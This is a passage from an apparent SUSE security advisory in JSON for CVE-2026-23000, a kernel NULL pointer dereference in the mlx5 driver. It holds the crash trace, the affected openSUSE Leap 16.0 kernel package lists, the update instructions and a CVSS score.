2nd time:\n\nmlx5_core 0000:00:03.0: E-Switch: Supported tc chains and prios offload\nBUG: kernel NULL pointer dereference, address: 0000000000000038\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\nPGD 0 P4D 0\nOops: Oops: 0000 [#1] SMP NOPTI\nCPU: 13 UID: 0 PID: 520 Comm: devlink Not tainted 6.18.0-rc4+ #91 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-2.fc40 04/01/2014\nRIP: 0010:mlx5e_detach_netdev+0x3c/0x90\nCode: 50 00 00 f0 80 4f 78 02 48 8b bf e8 07 00 00 48 85 ff 74 16 48 8b 73 78 48 d1 ee 83 e6 01 83 f6 01 40 0f b6 f6 e8 c4 42 00 00 \u003c48\u003e 8b 45 38 48 85 c0 74 08 48 89 df e8 cc 47 40 1e 48 8b bb f0 07\nRSP: 0018:ffffc90000673890 EFLAGS: 00010246\nRAX: 0000000000000000 RBX: ffff8881036a89c0 RCX: 0000000000000000\nRDX: ffff888113f63800 RSI: ffffffff822fe720 RDI: 0000000000000000\nRBP: 0000000000000000 R08: 0000000000002dcd R09: 0000000000000000\nR10: ffffc900006738e8 R11: 00000000ffffffff R12: 0000000000000000\nR13: 0000000000000000 R14: ffff8881036a89c0 R15: 0000000000000000\nFS: 00007fdfb8384740(0000) GS:ffff88856a9d6000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000038 CR3: 0000000112ae0005 CR4: 0000000000370ef0\nCall Trace:\n \u003cTASK\u003e\n mlx5e_netdev_change_profile+0x45/0xb0\n mlx5e_vport_rep_load+0x27b/0x2d0\n mlx5_esw_offloads_rep_load+0x72/0xf0\n esw_offloads_enable+0x5d0/0x970\n mlx5_eswitch_enable_locked+0x349/0x430\n ? is_mp_supported+0x57/0xb0\n mlx5_devlink_eswitch_mode_set+0x26b/0x430\n devlink_nl_eswitch_set_doit+0x6f/0xf0\n genl_family_rcv_msg_doit+0xe8/0x140\n genl_rcv_msg+0x18b/0x290\n ? __pfx_devlink_nl_pre_doit+0x10/0x10\n ? __pfx_devlink_nl_eswitch_set_doit+0x10/0x10\n ? __pfx_devlink_nl_post_doit+0x10/0x10\n ? __pfx_genl_rcv_msg+0x10/0x10\n netlink_rcv_skb+0x52/0x100\n genl_rcv+0x28/0x40\n netlink_unicast+0x282/0x3e0\n ? __alloc_skb+0xd6/0x190\n netlink_sendmsg+0x1f7/0x430\n __sys_sendto+0x213/0x220\n ? __sys_recvmsg+0x6a/0xd0\n __x64_sys_sendto+0x24/0x30\n do_syscall_64+0x50/0x1f0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\nRIP: 0033:0x7fdfb8495047",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23000",
"url": "https://www.suse.com/security/cve/CVE-2026-23000"
},
{
"category": "external",
"summary": "SUSE Bug 1257234 for CVE-2026-23000",
"url": "https://bugzilla.suse.com/1257234"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
